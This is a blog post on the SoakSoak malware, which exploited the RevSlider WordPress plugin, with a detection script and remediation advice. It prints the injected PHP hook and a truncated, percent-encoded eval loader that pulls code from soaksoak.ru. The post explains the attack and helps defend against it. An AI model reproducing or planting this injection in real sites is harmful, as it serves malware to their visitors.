What's Up with Google Blocking 1 Million WordPress Sites?


Google is de-indexing and blocking sites with the RevSlider plugin enabled. By exploiting a security loophole found in the premium WordPress plugin RevSlider, SoakSoak modifies a file in a site’s WordPress installation and loads JavaScript malware.

RevSlider is often used in WordPress themes, and sometimes the plugin comes pre-loaded in a theme, so site owners are not even notified about the vulnerability on their sites. Moreover, it’s not a plugin that’s easily updated, as Sucuri’s Daniel Cid commented:

“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes”.

Visitors of infected sites may be redirected to a webpage that will attempt to download malware onto their computers. Google’s decision to block infected sites shortly after the vulnerability became known will hopefully prevent the malware from spreading any further.

Anatomy Behind SoakSoak Malware:

The malware modifies the file wp-includes/template-loader.php to include the following code snippet:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This snippet causes the JavaScript file at wp-includes/js/swfobject.js to be loaded on every page viewed on the site. That file contains the malware:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

When decoded, this code loads JavaScript malware from the soaksoak.ru domain, specifically the file http://soaksoak.ru/xteas/code, which then forces visitors to download certain files.
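Both modifications described above can be checked for on disk. The scanner below is an added example, not code from the original post or from Sucuri; the function names and the exit-code convention are assumptions, and it percent-decodes the loader for inspection instead of executing it.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# Indicators taken from the post: the injected PHP hook and the encoded JS loader.
PHP_FILE = "wp-includes/template-loader.php"
JS_FILE = "wp-includes/js/swfobject.js"
PHP_HOOK = re.compile(r"""wp_enqueue_script\(\s*["']swfobject["']\s*\)""")
JS_EVAL = re.compile(
    r"""eval\(\s*decodeURIComponent\s*\(\s*["']((?:%[0-9A-Fa-f]{2}|\.)+)["']""")
DOMAIN = re.compile(r"soaksoak\.ru", re.I)


def decode_payloads(js_text):
    """Percent-decode each eval(decodeURIComponent("...")) argument without running it."""
    return [unquote(m.group(1), errors="replace") for m in JS_EVAL.finditer(js_text)]


def scan_wordpress(root):
    """Return (relative_path, finding) tuples for the SoakSoak indicators under root."""
    root, findings = Path(root), []
    php = root / PHP_FILE
    if php.is_file() and PHP_HOOK.search(php.read_text(errors="replace")):
        findings.append((PHP_FILE, "swfobject enqueue hook in core template loader"))
    js = root / JS_FILE
    if js.is_file():
        text = js.read_text(errors="replace")
        for decoded in decode_payloads(text):
            note = "encoded eval() loader"
            if DOMAIN.search(decoded):
                note += " referencing soaksoak.ru"
            findings.append((JS_FILE, note))
        if DOMAIN.search(text):
            findings.append((JS_FILE, "plain-text soaksoak.ru reference"))
    return findings


if __name__ == "__main__":
    # Usage: python scan.py /path/to/wordpress  (defaults to the current directory)
    hits = scan_wordpress(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, note in hits:
        print(f"SUSPECT {path}: {note}")
    sys.exit(1 if hits else 0)
```

A non-zero exit status means at least one indicator matched, which makes the script usable from a cron job or a deployment check.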

If you are curious about your site, you can check whether it has been infected by the SoakSoak malware using Sucuri’s free SiteCheck scanner; its signatures have all been updated to detect the latest redirection.

Solutions:

No solution has yet been found for older versions of the RevSlider plugin, but you can keep the plugin updated to the latest version to avoid the security loophole.

If your site is already infected by this malware, first update the plugin or, better, remove it. There is also a list of resources in this WordPress Support thread that can help you correct the problem.

Posted 20 December, 2014
